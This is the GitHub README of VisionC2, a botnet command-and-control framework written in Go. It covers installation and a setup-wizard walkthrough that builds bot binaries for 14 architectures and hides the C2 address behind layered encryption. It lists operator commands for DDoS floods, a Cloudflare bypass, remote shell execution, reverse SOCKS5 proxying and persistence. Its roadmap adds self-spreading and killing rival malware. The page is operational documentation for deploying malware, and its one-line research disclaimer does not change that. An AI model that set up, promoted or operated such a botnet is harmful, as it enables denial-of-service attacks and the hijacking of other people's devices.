Skip to content

VisionC2 is a Go Based Botnet Framework with HMAC + TLS 1.3 Encryption, 10+ Attacks (L4/L7), Remote Code Execution, and Reverse SOCK5

License

Notifications You must be signed in to change notification settings

Syn2Much/VisionC2

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

73 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

VisionC2 – Advanced Botnet Command & Control Framework

πŸ“‘ Table of Contents

VisionC2 Banner Go Version Platform License

VisionC2 hides the C2 Url behind 4 layers of encryption(XOR,RC4,MD5,B64). Vision is built to be setup via setup script meaning there are no code changes required. Animation

2 Servers = 40k RPS/3-6 GBPS

πŸš€ Installation & Setup

Prerequisites

sudo apt update && sudo apt install -y upx-ucl openssl git wget gcc python3
# Go 1.23+ required - see https://go.dev/dl/

⭐ Use the Setup Wizard (Recommended)

git clone https://github.com/Syn2Much/VisionC2.git
cd VisionC2
python3 setup.py

πŸ’‘ Setup Wizard handles Encryption, Certs, and Code Updates. The entire setup for Vision takes no more then 5 minutes.


╔══════════════════════════════════════════════════════════╗
β•‘              Select Setup Mode                           β•‘
╠══════════════════════════════════════════════════════════╣
β•‘                                                          β•‘
β•‘  [1] Full Setup                                          β•‘
β•‘      New C2 address, magic code, certs, everything       β•‘
β•‘      Use for: Fresh install or complete rebuild          β•‘
β•‘                                                          β•‘
β•‘  [2] C2 URL Update Only                                  β•‘
β•‘      Change C2 domain/IP, keep magic code & certs        β•‘
β•‘      Use for: Server migration, domain change            β•‘
β•‘                                                          β•‘
β•‘  [0] Exit                                                β•‘
β•‘                                                          β•‘
β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•
➜ Select option [1]: 1
[i] Starting Full Setup...

╔══════════════════════════════════════════════════════════╗
β•‘ Step 1/5: C2 Server Configuration                        β•‘
β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•

➜ Enter C2 server IP/domain [127.0.0.1]: c2.domain.com
➜ Enter admin server port [420]: 200
[βœ“] C2 configured: c2.domain.com:443
[βœ“] Admin port: 200
[i] Bot connection port is fixed at 443 (TLS)

╔══════════════════════════════════════════════════════════╗
β•‘ Step 2/5: Security Token Generation                      β•‘
β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•

[i] Auto-generated Magic Code: 9rOKxDR%EV&90*X%
[i] Auto-generated Protocol Version: V3_3
[i] Auto-generated Crypt Seed: 3c841808

? Use auto-generated security tokens? [Y/n]: y
[i] Applying multi-layer obfuscation...
[βœ“] C2 address obfuscation verified βœ“

╔══════════════════════════════════════════════════════════╗
β•‘ Step 3/5: TLS Certificate Generation                     β•‘
β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•

[i] Certificate details (press Enter for defaults):

➜ Country code (2 letter) [US]: US
➜ State/Province [California]: California
➜ City [San Francisco]: San Francisco
➜ Organization [Security Research]: Sec Team
➜ Common Name (domain) [c2.domain.com]: 
➜ Valid days [365]: 360
[i] Generating 4096-bit RSA private key...
[i] Generating self-signed certificate...
[βœ“] TLS certificates generated successfully

╔══════════════════════════════════════════════════════════╗
β•‘ Step 4/5: Updating Source Code                           β•‘
β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•

[i] Updating cnc/main.go...
[βœ“] CNC configuration updated
[i] Updating bot/main.go...
[βœ“] Bot configuration updated

╔══════════════════════════════════════════════════════════╗
β•‘ Step 5/5: Building Binaries                              β•‘
β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•

? Build CNC server? [Y/n]: y
[i] Building CNC server...
[βœ“] CNC server built successfully
? Build bot binaries (14 architectures)? [Y/n]: y
[!] This will take several minutes...
[i] Building bot binaries for 14 architectures...
[i] This may take a few minutes...

That's it! The wizard handles everything:

  • C2 address configuration & obfuscation
  • Random magic codes & protocol versions
  • TLS certificate generation
  • Source code updates
  • Building CNC + 14 bot architectures

🎯 Quick Usage

# Start server
cd cnc && ./cnc

# Connect admin (in another terminal)
nc YOUR_IP YOUR_ADMIN_PORT
# Type "spamtec" β†’ login prompt appears

# Bot binaries ready in: bot/bins/
optional: protect UPX packed binaries from string analysis https://github.com/Syn2Much/upx-stripper

πŸ—οΈ Architecture Overview

VisionC2 operates on a client-server model with clear separation between administrative interfaces and bot agents:

β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”    TLS 1.3    β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚   Admin Console │◄──────────────►│    C2 Server    β”‚
β”‚  (Multi-User)   β”‚                β”‚  (Go Backend)   β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜                β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                                         β”‚ TLS 1.3
                                         β–Ό
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”                β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚   Bot Agents    │◄────────────────  Bot Registry   β”‚
β”‚ (14+ Architectures)β”‚                β”‚ & Management β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜                β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ πŸ“‘ C2 Resolution - How Bots Find Your Server                 β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚ The bot uses a multi-method resolution system:               β”‚
β”‚                                                              β”‚
β”‚ Resolution Order (automatic fallback):                       β”‚
β”‚   1. DNS TXT Record  β†’ Checks for TXT record on domain       β”‚
β”‚   2. DoH TXT Lookup  β†’ Cloudflare/Google DNS-over-HTTPS      β”‚
β”‚   3. A Record        β†’ Falls back to standard DNS A record   β”‚
β”‚   4. Direct IP       β†’ Uses the value as-is if IP:port       β”‚
β”‚                                                              β”‚
β”‚ You can enter:                                               β”‚
β”‚   β€’ Direct IP      β†’ 192.168.1.100 (simplest)                β”‚
β”‚   β€’ Domain name    β†’ c2.example.com (uses A record)          β”‚
β”‚   β€’ TXT domain     β†’ lookup.example.com (advanced)           β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

πŸ› οΈ Command Reference

User Management

  • help - Context-aware help system (shows available commands)
  • db - User database management (Owner only)
  • private - Specialized commands based on clearance level

Bot Operations

  • bots - List all active agents with detailed status
  • !<botid> <command> - Target specific agent
  • !info - Comprehensive system intelligence
  • !persist - Enhanced persistence mechanisms
  • !reinstall - Agent redeployment
  • !lolnogtfo - Secure agent removal

Network Operations

  • !socks <port> - Establish SOCKS5 reverse proxy
  • !stopsocks - Terminate proxy connections
  • !shell <command> - Secure remote execution
  • !detach <command> - Background process execution
  • !stream <command> - Real-time output streaming

Stress Testing

  • !udpflood <ip> <port> <duration>
  • !tcpflood <ip> <port> <duration>
  • !http <url/ip> <port> <duration>
  • !https <url> <duration> - TLS 1.3 flood with HTTP/2 fingerprinting
  • !tls <url> <duration> - Alias for HTTPS flood
  • !cfbypass <url> <duration> - Cloudflare UAM bypass attack
  • !syn/!ack/!gre/!dns - Protocol-specific attacks

πŸ“‹ Changelog

v3.4 - February 2026

  • BOT Send total device ram on registry
  • BOT Debug Logged full connection/register/tls/main loop
  • CNC Update New Eye Logo
  • CNC Show Total Bot Ram tracked

v3.3 - February 2026

  • !stop command - Instantly halt all running attacks
  • HTTPS/TLS 1.3 flood attack with HTTP/2 fingerprinting
  • Cloudflare UAM bypass attack
  • DNS TXT record C2 resolution with DoH fallback
  • Multi-layer encryption (RC4 + XOR + byte substitution + MD5)
  • Setup wizard with menu system (Full Setup / C2 Update Only)
  • Fixed SOCKS5 proxy, target resolution, telnet handling
  • Anti-analysis obfuscation (meaningless function names)

v3.2 - January 2026

  • Added Reverse Socks 5 Modules
  • Cleaned up CNC UI
  • Built Setup.py to automate setup process

v3.1 - December 2025

  • Initial release with TLS 1.3 encrypted communications
  • 14 architecture cross-compilation support
  • HMAC challenge-response authentication

πŸ“‹ WIP/TODO

  • Multiple/Rotating Ports
  • Locker/Killer to stay on the device and kill competing malware
  • Spread/Self-Rep Mechanism
  • Enhanced Daemonize
  • Single Instance/Port Takeover Networking

βš–οΈ Disclaimer

Authorized security research only. Obtain written permission before use. The developers assume no liability and are not responsible for any misuse or damage caused by this program.

🀝 Community & Support

Contributing

We welcome contributions from security professionals:

  • Code improvements and optimizations
  • Additional evasion techniques
  • Enhanced security features
  • Documentation and examples

Acknowledgments

Built upon the framework of 1birdo's BotnetGo

πŸ“§ Contact: dev@sinners.city

About

VisionC2 is a Go Based Botnet Framework with HMAC + TLS 1.3 Encryption, 10+ Attacks (L4/L7), Remote Code Execution, and Reverse SOCK5

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •